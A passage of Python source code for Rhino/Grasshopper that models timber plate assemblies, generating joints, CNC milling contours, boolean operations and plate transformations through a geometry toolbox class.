chamfer_brep_1 = Toolbox.Breps.brep_from_2_poly(chamfer_faces[0], chamfer_faces[1])
chamfer_brep_2 = Toolbox.Breps.brep_from_2_poly(chamfer_faces[2], chamfer_faces[3])
pieces[0] = chamfer_brep_1
pieces[1] = chamfer_brep_2
#chamfer contour
to_insert=[]
for k in range(len(contours)):
c1 = Toolbox.Curves.trim_curve_with_curve(rs.coercecurve(chamfer_sides[2*k]), contours[k])
c2 = Toolbox.Curves.trim_curve_with_curve(rs.coercecurve(chamfer_sides[2*k+1]), contours[k])
line = rs.AddLine(rs.CurveStartPoint(c1),rs.CurveStartPoint(c2))
to_insert.append(rs.coercecurve(rs.JoinCurves([c1, line, c2])))
piece_i_top, piece_i_bottom, piece_nb_top, piece_nb_bottom = to_insert[0], to_insert[1], to_insert[2], to_insert[3]
#append final attributes
self.plates[i].joints_negatives.append(pieces[0])
self.plates[nb].joints_negatives.append(pieces[1])
self.plates[i].top_contour = Toolbox.Curves.insert_curves(self.plates[i].top_contour, [piece_i_top])
self.plates[i].bottom_contour = Toolbox.Curves.insert_curves(self.plates[i].bottom_contour, [piece_i_bottom])
self.plates[nb].top_contour = Toolbox.Curves.insert_curves(self.plates[nb].top_contour, [piece_nb_top])
self.plates[nb].bottom_contour = Toolbox.Curves.insert_curves(self.plates[nb].bottom_contour, [piece_nb_bottom])
#Structural analysis
pm=rs.CurveClosestPoint(self.FEM_plates[i],center)
pf=rs.CurveClosestPoint(self.FEM_plates[nb],center)
self.FEM_plates[i] = scriptcontext.doc.Objects.Add(self.FEM_plates[i])
self.FEM_plates[nb] = scriptcontext.doc.Objects.Add(self.FEM_plates[nb])
joint_line = rs.AddLine(rs.EvaluateCurve(self.FEM_plates[i],pm), rs.EvaluateCurve(self.FEM_plates[nb],pf))
rs.InsertCurveKnot(self.FEM_plates[i],pm)
rs.InsertCurveKnot(self.FEM_plates[nb],pf)
self.FEM_plates[i] = rs.coercecurve(self.FEM_plates[i])
self.FEM_plates[nb] = rs.coercecurve(self.FEM_plates[nb])
self.FEM_joints.append(rs.coercecurve(joint_line))
# Operations ----------------------------------
@__skip_nones
def get_fabrication_lines(self,
plates='all',
contour_tool_radius = 1.0,
holes_tool_radius = 1.0,
notch=False,
cylinder=False,
limit = 1,
tbone = False):
for i in range(self.count):
# apply to all or some plates.
flag = True
if (plates != None) and (plates != 'all'):
flag = False
for j in range(len(plates)):
if str(i) == plates[j]: flag = True
if flag == True:
# match seam and direction
self.plates[i].bottom_contour = Toolbox.Curves.resimplify_Curve(self.plates[i].bottom_contour)
self.plates[i].bottom_contour = Toolbox.Curves.align_curve_direction(self.plates[i].top_contour, self.plates[i].bottom_contour)
self.plates[i].top_contour, self.plates[i].bottom_contour = Toolbox.Curves.match_seams(self.plates[i].top_contour,self.plates[i].bottom_contour, True)
# offset contour outside + create notches
tmc, bmc = Toolbox.Curves.offset_with_tool(self.plates[i].top_contour, self.plates[i].bottom_contour, contour_tool_radius, notch, limit, tbone)
#match seams
self.plates[i].top_milling_contour = rs.coercecurve(tmc)
self.plates[i].bottom_milling_contour = rs.coercecurve(bmc)
if (cylinder is True) and (notch is True):
#cylinder planes and solids
tmc_spikes = Toolbox.Curves.get_spikes(tmc)
bmc_spikes = Toolbox.Curves.get_spikes(bmc)
if tmc_spikes != None:
for k in range(len(tmc_spikes)):
#cylinder points
tmc_cylinder_point = rs.CurveEndPoint(tmc_spikes[k])
bmc_cylinder_point = rs.CurveEndPoint(bmc_spikes[k])
#cylinder planes and scale
path = rs.AddLine(tmc_cylinder_point,bmc_cylinder_point)
path_center =Toolbox.Points.average_point([tmc_cylinder_point,bmc_cylinder_point])
path_length = rs.Distance(tmc_cylinder_point,bmc_cylinder_point)
axis = Toolbox.Vectors.line_to_vec(path)
axis_angle = rs.VectorAngle(axis,self.plates[i].top_plane.ZAxis)
factor = (path_length + 2*contour_tool_radius*abs(math.tan(math.radians(axis_angle))))/path_length
scaled_path = rs.ScaleObject(path,path_center, [factor,factor,factor],True)
tmc_cylinder_plane = rs.PlaneFromNormal(rs.CurveStartPoint(scaled_path),axis)
# create cylinder on holes notches for optional boolean operation
circle = rs.AddCircle(tmc_cylinder_plane, contour_tool_radius)
cyl = rs.ExtrudeCurve(circle, scaled_path)
rs.CapPlanarHoles(cyl)
self.plates[i].joints_negatives.append(rs.coercebrep(cyl))
#additional notch block
if rs.CurveLength(tmc_spikes[k]) > contour_tool_radius:
disk = rs.AddPlanarSrf(rs.AddCircle(tmc_cylinder_plane,10*(rs.CurveLength(tmc_spikes[k])+2*contour_tool_radius)))
inclination = rs.VectorCreate(rs.CurveEndPoint(path), rs.CurveStartPoint(path))
proj = rs.ProjectCurveToSurface(tmc_spikes[k],disk,inclination)
rot = rs.RotateObject(proj, tmc_cylinder_plane.Origin, 90, tmc_cylinder_plane.ZAxis)
moveV = rs.VectorCreate(tmc_cylinder_plane.Origin, rs.CurveMidPoint(rot))
mov = rs.MoveObject(rot, moveV)
sca = rs.ScaleObject(mov, tmc_cylinder_plane.Origin, [10,10,10],True)
inters = rs.CurveCurveIntersection(circle, sca)
p1 = inters[0][1]
p2 = inters[1][1]
spike_plane = rs.PlaneFromNormal(tmc_cylinder_point, self.plates[i].top_plane.ZAxis)
disk2 = rs.AddPlanarSrf(rs.AddCircle(spike_plane,10*(rs.CurveLength(tmc_spikes[k])+2*contour_tool_radius)))
para = rs.ProjectPointToSurface([p1,p2],disk2,inclination)
para2 = rs.CopyObjects(para, rs.VectorCreate(rs.CurveStartPoint(tmc_spikes[k]), rs.CurveEndPoint(tmc_spikes[k])))
parallelo = rs.AddPolyline([para[0],para[1],para2[1],para2[0],para[0]])
path = rs.ScaleObject(path, rs.CurveMidPoint(path), [1.01,1.01,1.01])
paralleli = rs.ExtrudeCurve(parallelo, path)
rs.CapPlanarHoles(paralleli)
self.plates[i].joints_negatives.append(rs.coercebrep(paralleli))
# offset holes inside + create notches
if self.plates[i].top_holes != [] :
for j in range(len(self.plates[i].top_holes)):
# offset holes inside + create notches
tmh, bmh = Toolbox.Curves.offset_with_tool(self.plates[i].top_holes[j], self.plates[i].bottom_holes[j], -holes_tool_radius, notch, limit, tbone)
#match seams
self.plates[i].top_milling_holes.append(rs.coercecurve(tmh))
self.plates[i].bottom_milling_holes.append(rs.coercecurve(bmh))
if (cylinder is True) and (notch is True):
#cylinder planes and solids
tmh_spikes = Toolbox.Curves.get_spikes(tmh)
bmh_spikes = Toolbox.Curves.get_spikes(bmh)
if tmh_spikes != None:
for k in range(len(tmh_spikes)):
#cylinder points
tmh_cylinder_point = rs.CurveEndPoint(tmh_spikes[k])
bmh_cylinder_point = rs.CurveEndPoint(bmh_spikes[k])
#cylinder planes and scale
path = rs.AddLine(tmh_cylinder_point,bmh_cylinder_point)
path_center =Toolbox.Points.average_point([tmh_cylinder_point,bmh_cylinder_point])
path_length = rs.Distance(tmh_cylinder_point,bmh_cylinder_point)
axis = Toolbox.Vectors.line_to_vec(path)
axis_angle = rs.VectorAngle(axis,self.plates[i].top_plane.ZAxis)
factor = 1.001*(path_length + 2*holes_tool_radius*abs(math.tan(math.radians(axis_angle))))/path_length
scaled_path = rs.ScaleObject(path,path_center, [factor,factor,factor],True)
tmh_cylinder_plane = rs.PlaneFromNormal(rs.CurveStartPoint(scaled_path),axis)
# create cylinder on holes notches for optional boolean operation
circle = rs.AddCircle(tmh_cylinder_plane, holes_tool_radius)
cyl = rs.ExtrudeCurve(circle, scaled_path)
rs.CapPlanarHoles(cyl)
self.plates[i].joints_negatives.append(rs.coercebrep(cyl))
#additional notch block
if rs.CurveLength(tmh_spikes[k]) > holes_tool_radius:
disk = rs.AddPlanarSrf(rs.AddCircle(tmh_cylinder_plane,10*(rs.CurveLength(tmh_spikes[k])+2*holes_tool_radius)))
inclination = rs.VectorCreate(rs.CurveEndPoint(path), rs.CurveStartPoint(path))
proj = rs.ProjectCurveToSurface(tmh_spikes[k],disk,inclination)
rot = rs.RotateObject(proj, tmh_cylinder_plane.Origin, 90, tmh_cylinder_plane.ZAxis)
moveV = rs.VectorCreate(tmh_cylinder_plane.Origin, rs.CurveMidPoint(rot))
mov = rs.MoveObject(rot, moveV)
sca = rs.ScaleObject(mov, tmh_cylinder_plane.Origin, [10,10,10],True)
inters = rs.CurveCurveIntersection(circle, sca)
p1 = inters[0][1]
p2 = inters[1][1]
spike_plane = rs.PlaneFromNormal(tmh_cylinder_point, self.plates[i].top_plane.ZAxis)
disk2 = rs.AddPlanarSrf(rs.AddCircle(spike_plane,10*(rs.CurveLength(tmh_spikes[k])+2*contour_tool_radius)))
para = rs.ProjectPointToSurface([p1,p2],disk2,inclination)
para2 = rs.CopyObjects(para, rs.VectorCreate(rs.CurveStartPoint(tmh_spikes[k]), rs.CurveEndPoint(tmh_spikes[k])))
parallelo = rs.AddPolyline([para[0],para[1],para2[1],para2[0],para[0]])
path = rs.ScaleObject(path, rs.CurveMidPoint(path), [1.01,1.01,1.01])
paralleli = rs.ExtrudeCurve(parallelo, path)
rs.CapPlanarHoles(paralleli)
self.plates[i].joints_negatives.append(rs.coercebrep(paralleli))
@__skip_nones
def perform_boolean_operations(self, plates='all', bool_tol=0.1, merge_tol=0.01):
# Boolean union
for i in range(self.count):
flag = True
if (plates != None) and (plates != 'all') and (plates != []):
flag = False
for j in range(len(plates)):
if str(i) == plates[j]: flag = True
if flag == True:
if len(self.plates[i].joints_positives) != 0 :
try:
# rhino_common methods (more reliable)
brep = rs.coercebrep(rs.CopyObject(self.plates[i].brep))
rhino_joined = rg.Brep.JoinBreps([brep]+self.plates[i].joints_positives, bool_tol)
rhino_unified = rg.Brep.CreateBooleanUnion(rhino_joined, bool_tol)[0]
rhino_unified.MergeCoplanarFaces(merge_tol, merge_tol)
# back to grasshopper
scriptcontext.doc.Objects.Add(rhino_unified)
self.plates[i].brep = rhino_unified
except:
print("boolean addition failed on plate " + str(i))
brep = rs.coercebrep(rs.CopyObject(self.plates[i].brep))
rhino_joined = rg.Brep.JoinBreps([brep]+self.plates[i].joints_positives, bool_tol)
rhino_unified = rg.Brep.CreateBooleanUnion(rhino_joined, bool_tol)
self.plates[i].joints_positives = []
# Boolean difference
for i in range(self.count):
if str(i) in plates or plates == 'all':
if len(self.plates[i].joints_negatives) != 0 :
try:
for j in range(len(self.plates[i].joints_negatives)):
#check orientation
self.plates[i].joints_negatives[j] = rs.coercebrep(self.plates[i].joints_negatives[j])
if(self.plates[i].joints_negatives[j].SolidOrientation == rg.BrepSolidOrientation.Inward):
rg.Brep.Flip(self.plates[i].joints_negatives[j])
if(self.plates[i].brep.SolidOrientation == rg.BrepSolidOrientation.Inward):
rg.Brep.Flip(self.plates[i].brep)
try:
self.plates[i].brep = rg.Brep.CreateBooleanDifference(self.plates[i].brep, self.plates[i].joints_negatives[j], bool_tol)[0]
except:
self.temp.append(self.plates[i].joints_negatives[j])
print('Boolean difference failed on plate '+str(i)+' with joint '+str(j))
#try merge faces
try:
rg.Brep.MergeCoplanarFaces(self.plates[i].brep, merge_tol, merge_tol)
except:
print("couldn't merge faces further on plate "+ str(i))
#back to grasshopper
scriptcontext.doc.Objects.Add(self.plates[i].brep)
except: print("boolean difference failed on plate " + str(i))
self.plates[i].joints_negatives = []
@__skip_nones
def transform(self,
mode = 'Array',
origin = rs.PlaneFromFrame((0,0,0), (1,0,0), (0,1,0)),
step = (1,0,0),
flip = None,
custom = [],
scale = 1.0,
target = rs.PlaneFromFrame((0,0,0), (1,0,0), (0,1,0))):
#array parameters
if mode == 1 : mode = 'Array'
if mode == 2 : mode = 'Stack'
if mode == 3 : mode = 'Custom'
if mode == 4 : mode = 'Scale'
if mode == 5 : mode = 'Orient'
if len(origin) == 3: origin = rs.PlaneFromFrame(origin, (1,0,0), (0,1,0))
center = origin.Origin
step = rs.VectorCreate(step, (0,0,0))
#compute total stack height
if mode == 'Stack':
stack_height = 0
for i in range(self.count):
stack_height += self.plates[i].thickness
#get transformation for each plate
for i in range(self.count):
#list of all attributes to be transformed
attributes=[self.breps[i],
self.contact_zones[i],
self.contact_vectors[i],
self.contact_spheres[i],
self.contact_breps[i],
self.contact_centers[i],
self.contact_planes[i],
self.contact_normals[i],
self.FEM_joints[i],
self.FEM_plates[i],
self.plates[i].brep,
self.plates[i].top_face,
self.plates[i].bottom_face,
self.plates[i].top_contour,
self.plates[i].bottom_contour,
self.plates[i].mid_contour,
self.plates[i].top_holes,
self.plates[i].bottom_holes,
self.plates[i].top_center,
self.plates[i].plate_center,
self.plates[i].bottom_center,
self.plates[i].top_normal,
self.plates[i].bottom_normal,
self.plates[i].top_plane,
self.plates[i].mid_plane,
self.plates[i].bottom_plane,
self.plates[i].top_milling_contour,
self.plates[i].bottom_milling_contour,
self.plates[i].top_milling_holes,
self.plates[i].bottom_milling_holes,
self.plates[i].joints_positives,
self.plates[i].joints_negatives,
self.plates[i].joints_keys]
# stack transform
if mode == 'Stack':
stack_height -= self.plates[i].thickness
plate_height = stack_height + (self.plates[i].thickness /2 )
point = rs.CopyObject(center, origin.ZAxis*plate_height)
# array transform
if mode == 'Array':
point = rs.CopyObject(center, step * i)
# custom transform
if mode == 'Custom':
if custom != None and custom != []:
for j in range(len(custom)):
point = custom[i % len(custom)]
else:
point = center
# flip option
if mode == 'Custom' or mode == 'Array' or mode == 'Stack':
mid_plane = self.plates[i].mid_plane
flat_plane = rs.PlaneFromFrame(point, origin.XAxis, origin.YAxis)
if flip != None:
if str(i) in flip:
self.log.append('plate '+ str(i) + ' was flipped')
flat_plane = rs.PlaneFromFrame(point, origin.XAxis, -origin.YAxis)
# Matrix from Plane to plane orientation
matrix = rg.Transform.PlaneToPlane(mid_plane, flat_plane)
# Scaling transformation
if mode == 'Scale':
if scale <= 0 :
scale = 1.0
raise Exception('scaling factor should be greater than 0')
self.plates[i].thickness = self.plates[i].thickness * scale
matrix = rg.Transform.Scale(center, scale)
# Orient (Move/rotate) transformation
if mode == 'Orient':
ref = origin
matrix = rg.Transform.PlaneToPlane(ref, target)
# Transforming each attribute
if mode == 'Custom' or mode == 'Array' or mode == 'Stack' or mode == 'Scale' or mode == 'Orient':
for j in range(len(attributes)):
#dealing with attributes as lists of lists
if isinstance(attributes[j], list) is True:
for k in range(len(attributes[j])):
try:
attributes[j][k] = rs.coercegeometry(rs.TransformObject(attributes[j][k], matrix))
except:
try:
rg.Vector3d.Transform(attributes[j][k], matrix)
rg.Vector3d.Unitize(attributes[j][k])
except:
try:
rg.Plane.Transform(attributes[j][k], matrix)
except:
if attributes[j][k] != "gravity": print(attributes[j][k], j, k)
#dealing with attributes as simple lists
else:
try:
attributes[j] = rs.coercegeometry(rs.TransformObject(attributes[j], matrix))
except:
try:
rg.Vector3d.Transform(attributes[j], matrix)
rg.Vector3d.Unitize(attributes[j])
except:
try:
rg.Plane.Transform(attributes[j], matrix)
except:
if attributes[j] != "gravity":print(attributes[j], j)
for module in self.modules:
#update attributes that are linked to plate and model class
module.update()
#update attributes that are independant of the model and plate class
attributes=[module.assembly_vectors]
# Transforming each attribute
if mode == 'Custom' or mode == 'Array' or mode == 'Stack' or mode == 'Scale' or mode == 'Orient':
for j in range(len(attributes)):
#dealing with attributes as lists of lists
if isinstance(attributes[j], list) is True:
for k in range(len(attributes[j])):
try:
attributes[j][k] = rs.coercegeometry(rs.TransformObject(attributes[j][k], matrix))
except:
try:
rg.Vector3d.Transform(attributes[j][k], matrix)
rg.Vector3d.Unitize(attributes[j][k])
except:
try:
rg.Plane.Transform(attributes[j][k], matrix)
except:
if attributes[j][k] != "gravity": print(attributes[j][k], j, k)
#dealing with attributes as simple lists
else:
try:
attributes[j] = rs.coercegeometry(rs.TransformObject(attributes[j], matrix))
except:
try:
rg.Vector3d.Transform(attributes[j], matrix)
rg.Vector3d.Unitize(attributes[j])
except:
try:
rg.Plane.Transform(attributes[j], matrix)
except:
if attributes[j] != "gravity":print(attributes[j], j)
@__skip_nones
def switch_top_bottom(self, plates=[]):
for i in range(self.count):
flag = False
if plates == 'all' : flag = True
if plates != [] and plates != None:
for j in range(len(plates)):
if plates[j] == i: flag = True
if flag == True:
pl = self.plates[i]
pl.top_face, pl.bottom_face = pl.bottom_face, pl.top_face
pl.top_contour, pl.bottom_contour = pl.bottom_contour, pl.top_contour
pl.top_holes, pl.bottom_holes = pl.bottom_holes, pl.top_holes
pl.top_center, pl.bottom_center = pl.bottom_center, pl.top_center
pl.top_normal, pl.bottom_normal = pl.bottom_normal, pl.top_normal
pl.top_plane, pl.bottom_plane = pl.bottom_plane, pl.top_plane
pl.top_milling_contour, pl.bottom_milling_contour = pl.bottom_milling_contour, pl.top_milling_contour
pl.top_milling_holes, pl.bottom_milling_holes = pl.bottom_milling_holes, pl.top_milling_holes
#Modules -----------------------------------------------------------------------
class PlateModule(PlateModel):
def __init__(self, model, index, step, sub_sequence, parent, children):
# INITIALIZATION -------------------------------------
self.temp = []
self.model = model #inherit model attributes
self.index = index
self.plate_ids = Toolbox.Data.flatten_integer_list(ast.literal_eval(sub_sequence))
self.plates = [self.model.plates[integer] for integer in self.plate_ids]
self.breps = [plate.brep for plate in self.plates]
self.count = len(ast.literal_eval(sub_sequence))
self.count_all = len(self.breps)
self.step = step
self.sequence = sub_sequence
self.parent = parent
self.children = children
self.assembly_spaces = [None]
self.assembly_vectors = [None]
self.assembly_relatives = [None]
self.needed_supports = 1
# TOPOLOGY -------------------------------------------
self.contact_ids = [self.model.contact_ids[integer] for integer in self.plate_ids]
self.contact_pairs = [self.model.contact_pairs[integer] for integer in self.plate_ids]
self.contact_breps = [self.model.contact_breps[integer] for integer in self.plate_ids]
self.contact_zones= [self.model.contact_zones[integer] for integer in self.plate_ids]
self.contact_types = [self.model.contact_types[integer] for integer in self.plate_ids]
self.contact_strings = [self.model.contact_strings[integer] for integer in self.plate_ids]
self.contact_centers = [self.model.contact_centers[integer] for integer in self.plate_ids]
self.contact_normals = [self.model.contact_normals[integer] for integer in self.plate_ids]
self.contact_planes = [self.model.contact_planes[integer] for integer in self.plate_ids]
def update(self):
self.plates = [self.model.plates[integer] for integer in self.plate_ids]
self.breps = [plate.brep for plate in self.plates]
self.contact_breps = [self.model.contact_breps[integer] for integer in self.plate_ids]
self.contact_zones= [self.model.contact_zones[integer] for integer in self.plate_ids]
self.contact_centers = [self.model.contact_centers[integer] for integer in self.plate_ids]
self.contact_normals = [self.model.contact_normals[integer] for integer in self.plate_ids]
self.contact_planes = [self.model.contact_planes[integer] for integer in self.plate_ids]
pass
#Plates -----------------------------------------------------------------------
class Plate:
def __init__(self, brep, index):
# INITIALIZATION -------------------------------------
self.temp = []
self.index = index
self.brep = copy.deepcopy(brep)
self.top_face = self.__get_top_face()
self.bottom_face = self.__get_bottom_face()
self.top_contour = self.__get_top_contour()
self.bottom_contour = self.__get_bottom_contour()
self.mid_contour = self.__get_mid_contour()
self.top_holes = self.__get_top_holes()
self.bottom_holes = self.__get_bottom_holes()
self.top_center = self.__get_top_center()
self.bottom_center = self.__get_bottom_center()
self.plate_center =self.__get_plate_center()
self.top_normal = self.__get_top_normal()
self.bottom_normal = self.__get_bottom_normal()
self.top_plane = self.__get_top_plane()
self.bottom_plane = self.__get_bottom_plane()
self.mid_plane = self.__get_mid_plane()
self.thickness = self.__get_thickness()
# JOINERY --------------------------------------------
self.joints_positives = []
self.joints_negatives = []
self.joints_keys = []
# FABRICATION ----------------------------------------
self.top_milling_contour = None
self.bottom_milling_contour = None
self.top_milling_holes = []
self.bottom_milling_holes = []
def __get_top_face(self):
faces = self.brep.Faces
sortedfaces = Toolbox.Surfaces.sort_surfaces_by_area(faces)
sortedfaces.reverse()
top_and_bottom = [sortedfaces[0][0],sortedfaces[1][0]]
top_face = Toolbox.Surfaces.sort_surfaces_by_altitude(top_and_bottom)[1][0]
return top_face
def __get_bottom_face(self):
faces = self.brep.Faces
sortedfaces = Toolbox.Surfaces.sort_surfaces_by_area(faces)
sortedfaces.reverse()
top_and_bottom = [sortedfaces[0][0],sortedfaces[1][0]]
bottom_face = Toolbox.Surfaces.sort_surfaces_by_altitude(top_and_bottom)[0][0]
return bottom_face
def __get_top_contour(self):
largest_contour = Toolbox.Surfaces.get_face_largest_contour(self.top_face)
if type(largest_contour) != rg.PolylineCurve: largest_contour=largest_contour.ToPolyline(0.01,0.01,0.01,10000)
largest_contour = Toolbox.Curves.resimplify_Curve(largest_contour)
return largest_contour
def __get_bottom_contour(self):
perimeter = Toolbox.Surfaces.get_face_largest_contour(self.bottom_face)
perimeter = Toolbox.Curves.align_curve_direction(self.top_contour,perimeter)
perimeter = Toolbox.Curves.match_seams(self.top_contour,perimeter)[1]
if type(perimeter) != rg.PolylineCurve: perimeter=perimeter.ToPolyline(0.01,0.01,0.01,10000)
return perimeter
def __get_mid_contour(self):
top_vertices = rs.PolylineVertices(self.top_contour)
bottom_vertices = rs.PolylineVertices(self.bottom_contour)
mid_vertices = []
for i in range(len(top_vertices)):
mid_vertices.append((top_vertices[i]+bottom_vertices[i])/2)
return rs.coercecurve(rs.AddPolyline(mid_vertices))
def __get_top_holes(self):
return Toolbox.Surfaces.get_face_other_contours(self.top_face)
def __get_bottom_holes(self):
perimeters = Toolbox.Surfaces.get_face_other_contours(self.bottom_face)
if perimeters != [] :
for i in range(len(perimeters)):
#adjust seamtop_contour
new_seam = rg.Curve.ClosestPoint(perimeters[i], self.top_holes[i].PointAtStart)[1]
perimeters[i].ChangeClosedCurveSeam(new_seam)
#adjust direction
perimeters[i] = Toolbox.Curves.align_curve_direction(self.top_holes[i],perimeters[i])
return perimeters
def __get_top_center(self):
return rs.CurveAreaCentroid(self.top_contour)[0]
def __get_bottom_center(self):
return rs.CurveAreaCentroid(self.bottom_contour)[0]
def __get_plate_center(self):
return (self.top_center + self.bottom_center) /2
def __get_top_normal(self):
normal = rs.SurfaceNormal(self.top_face,[0,0])
if Toolbox.Vectors.is_vector_outward(self.plate_center, self.top_center, normal) is True:
return normal
else: return -normal
def __get_bottom_normal(self):
normal = rs.SurfaceNormal(self.bottom_face,[0,0])
if Toolbox.Vectors.is_vector_outward(self.plate_center, self.bottom_center, normal) is True:
return normal
else: return -normal
def __get_top_plane(self):
origin = self.top_center
sides = rs.ExplodeCurves(rs.CopyObject(self.top_contour))
longest_side = Toolbox.Curves.sort_curves_by_length(sides)[-1][0]
x_axis = rs.VectorCreate(rs.CurveStartPoint(longest_side), rs.CurveEndPoint(longest_side))
return rs.PlaneFromNormal(origin, self.top_normal, x_axis)
def __get_bottom_plane(self):
return rs.CreatePlane(self.bottom_center,self.top_plane.YAxis,self.top_plane.XAxis)
def __get_mid_plane(self):
return rs.CreatePlane(self.plate_center,self.top_plane.XAxis,self.top_plane.YAxis)
def __get_thickness(self):
pointA = self.top_center
pointB = rg.Plane.ClosestPoint(self.bottom_plane, pointA)
t = rg.Point3d.DistanceTo(pointA,pointB)
return t
pass
#Toolbox -----------------------------------------------------------------------
class Toolbox:
"""Class of geometrical functions extending the rhinocommon library"""
class Breps:
@staticmethod #wip
def is_plate():
pass
@staticmethod
def brep_edges(brep):
array = rg.Brep.DuplicateEdgeCurves(brep)
edges = []
for curve in array:
edges.append(curve)
return edges
@staticmethod
def brep_faces(brep):
brep = rs.coercebrep(brep)
faces = []
for face in brep.faces:
faces.append(face)
return faces
@staticmethod
def brep_vertices(brep):
array = rg.Brep.DuplicateVertices(brep)
vertices = []
for point in array:
vertices.append(point)
return vertices
@staticmethod
def brep_centroid(brep):
brep = rs.coercebrep(brep)
return rg.AreaMassProperties.Compute(brep).Centroid
@staticmethod
def slice_2_planes(brep, top_plane, bottom_plane):
#top plane
tbrep = copy.deepcopy(brep)
tbrep = rg.Brep.Trim(tbrep, top_plane, 0.1)
if len(tbrep) > 0:
tbrep = tbrep[0]
tbrep = rg.Brep.CapPlanarHoles(tbrep, 0.1)
else: tbrep = copy.deepcopy(brep)
#bottom plane
bbrep = copy.deepcopy(tbrep)
bbrep = rg.Brep.Trim(bbrep, bottom_plane, 0.1)
if len(bbrep) > 0:
bbrep = bbrep[0]
bbrep = rg.Brep.CapPlanarHoles(bbrep, 0.1)
else: bbrep = copy.deepcopy(tbrep)
#back to grasshopper
brep = bbrep
scriptcontext.doc.Objects.Add(brep)
return brep
@staticmethod
def brep_from_2_poly(poly1, poly2):
poly2 = Toolbox.Curves.align_curve_direction(rs.coercegeometry(poly1), rs.coercegeometry(poly2))
poly2 = rs.AddPolyline(rs.PolylineVertices(poly2)+[rs.PolylineVertices(poly2)[0]])
poly1, poly2 = Toolbox.Curves.match_seams(rs.coercecurve(poly1),rs.coercecurve(poly2))
points_a = rs.PolylineVertices(poly1)
points_b = rs.PolylineVertices(poly2)
faces = []
if len(points_a) == len(points_b):
for i in range(len(points_a)-1):
poly = rs.AddPolyline([(points_a[i]), (points_a[i+1]), (points_b[i+1]), (points_b[i]), (points_a[i])])
faces.append(rs.AddPlanarSrf(poly)[0])
brep = rs.JoinSurfaces(faces)
rs.CapPlanarHoles(brep)
return rs.coercebrep(brep)
@staticmethod
def box_from_2_poly(poly1, poly2):
box = rs.AddBox(rs.PolylineVertices(poly1)[0:4]+rs.PolylineVertices(poly2)[0:4])
#box = rg.Brep.CreateFromBox(poly1[0:4] + poly2[0:4])
return box
@staticmethod
def box_from_6_planes(pair1,pair2,pair3):
"""create a deformed box from three pairs of planes. Planes of opposed faces should be grouped together."""
points=[]
for i in range(len(pair1)):
for j in range(len(pair2)):
for k in range(len(pair3)):
points.append(Toolbox.Planes.three_planes_intersection(pair1[i],pair2[j],pair3[k]))
poly1 = rs.AddPolyline([points[0]]+[points[1]]+[points[3]]+[points[2]]+[points[0]])
poly2 = rs.AddPolyline([points[4]]+[points[5]]+[points[7]]+[points[6]]+[points[4]])
box = Toolbox.Breps.box_from_2_poly(poly1,poly2)
return box
class Surfaces:
@staticmethod
def surface_centroid(surface):
surface = rs.coercesurface(surface)
return rg.AreaMassProperties.Compute(surface).Centroid
@staticmethod
def sort_surfaces_by_altitude(planar_surfaces):
faces = planar_surfaces
faces_tuples = []
for i in range(len(faces)):
face_centroid = Toolbox.Surfaces.surface_centroid(faces[i])
faces_tuples.append([faces[i],face_centroid[2]])
sortedfaces = sorted(faces_tuples, key=lambda faces: faces[1])
return sortedfaces
@staticmethod
def sort_surfaces_by_area(planar_surfaces):
faces = planar_surfaces
faces_tuples = []
for face in faces:
#test_planar = rg.Surface.IsPlanar(face)
#if test_planar is True:
face = rg.BrepFace.DuplicateFace(face, False)
face_area = rg.Brep.GetArea(face)
faces_tuples.append([face,face_area])
#else:
# raise Exception(' Brep faces must be planar')
# break
sortedfaces = sorted(faces_tuples, key=lambda faces: faces[1])
return sortedfaces
@staticmethod
def get_face_largest_contour(face):
if str(face.ObjectType) == 'Surface':
face = rg.Brep.CreateFromSurface(face)
curves = rg.Brep.DuplicateEdgeCurves(face)
borders = rg.Curve.JoinCurves(curves)
curves_tuples = []
for i in range(len(borders)):
surface = rg.Brep.CreatePlanarBreps(borders[i])
area = rg.AreaMassProperties.Compute(surface).Area
curves_tuples.append([borders[i], area])
sortedcurves = sorted(curves_tuples, key=lambda curves: curves[1])
sortedcurves.reverse()
perimeter = sortedcurves[0][0]
return perimeter
@staticmethod
def get_face_other_contours(face):
if str(face.ObjectType) == 'Surface':
face = rg.Brep.CreateFromSurface(face)
curves = rg.Brep.DuplicateEdgeCurves(face)
borders = rg.Curve.JoinCurves(curves)
curves_tuples = []
for i in range(len(borders)):
surface = rg.Brep.CreatePlanarBreps(borders[i])
area = rg.AreaMassProperties.Compute(surface).Area
curves_tuples.append([borders[i], area])
sortedcurves = sorted(curves_tuples, key=lambda curves: curves[1])
sortedcurves.reverse()
perimeters = []
if len(sortedcurves)>0:
for i in range(len(sortedcurves)-1):
perimeters.append(sortedcurves[i+1][0])
return perimeters
class Curves:
@staticmethod
def rectangle_dimensions(rectangle):
"get length and width from a rectangle"
curves = rs.ExplodeCurves(rectangle)
l1 = rs.CurveLength(curves[0])
l2 = rs.CurveLength(curves[1])
if l1 > l2:
return (l1, l2)
else:
return (l2, l1)
@staticmethod
def offset_with_tool(crv_top, crv_bot, tool_radius, notch=False, limit=1, tbone=False):
"""""Offset a pair of curves according to a tool radius for 5axis CNC cutting"""
if tool_radius == 0 : return (crv_top,crv_bot)
#convert to gh object to simplify the curve and reconvert to gh object
crv_top = Toolbox.Curves.resimplify_Curve(crv_top)
crv_bot = Toolbox.Curves.resimplify_Curve(crv_bot)
crv_top = scriptcontext.doc.Objects.Add(crv_top)
crv_bot = scriptcontext.doc.Objects.Add(crv_bot)
#get surface normal
normal = rs.SurfaceNormal(rs.AddPlanarSrf(crv_top),(0,0))
normal2 = rs.SurfaceNormal(rs.AddPlanarSrf(crv_bot),(0,0))
top_plane = rs.PlaneFromNormal(rs.CurveStartPoint(crv_top), normal)
bot_plane = rs.PlaneFromNormal(rs.CurveStartPoint(crv_bot), normal)
#check offset direction
testpoint = rs.CopyObject(top_plane.Origin, 0.0001*normal)
if (rs.Distance(bot_plane.Origin, testpoint) > rs.Distance(bot_plane.Origin, top_plane.Origin)):
rs.ReverseCurve(crv_top)
rs.ReverseCurve(crv_bot)
#explode curves
seg_top = rs.ExplodeCurves(crv_top)
seg_bot = rs.ExplodeCurves(crv_bot)
if rs.AddPlanarSrf(crv_top) is None: raise Exception('A curve is not planar')
if len(seg_top) != len(seg_bot): raise Exception('Offset_with_tool requires top and bottom curves with the same amount of vertices')
top_poly = []
bot_poly = []
# Create variable offset in function of the inclination of the tool
for i in range(len(seg_top)):
f1_plane = rs.PlaneFromPoints(rs.CurveStartPoint(seg_top[i-1]), rs.CurveEndPoint(seg_top[i-1]), rs.CurveStartPoint(seg_bot[i-1]))
